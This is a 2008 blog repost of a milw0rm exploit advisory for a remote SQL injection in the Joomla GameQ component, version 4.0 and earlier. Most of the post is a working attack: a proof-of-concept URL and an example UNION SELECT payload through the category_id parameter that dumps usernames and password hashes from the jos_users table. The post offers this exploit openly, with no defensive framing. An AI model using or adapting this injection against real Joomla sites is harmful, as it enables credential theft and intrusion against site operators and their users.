Software, Internet, Networking, And Security Review :: Bug - Joomla Component GameQ :: June

Software And Internet Blog

June 8, 2008

Bug - Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

/—————————————————————\
\ /
/ Joomla Component GameQ Remote SQL injection \
\ /
\—————————————————————/

[*] Author : His0k4 [ALGERIAN HaCkEr]

[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}

[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users–

# milw0rm.com [2008-06-07]

Comments »

The URI to TrackBack this entry is: http://blackraptor.blogsome.com/2008/06/08/bug-joomla-component-gameq/trackback/

No comments yet.

RSS feed for comments on this post.

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>

Software And Internet Blog

June 8, 2008

Bug - Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability

Comments »

Leave a comment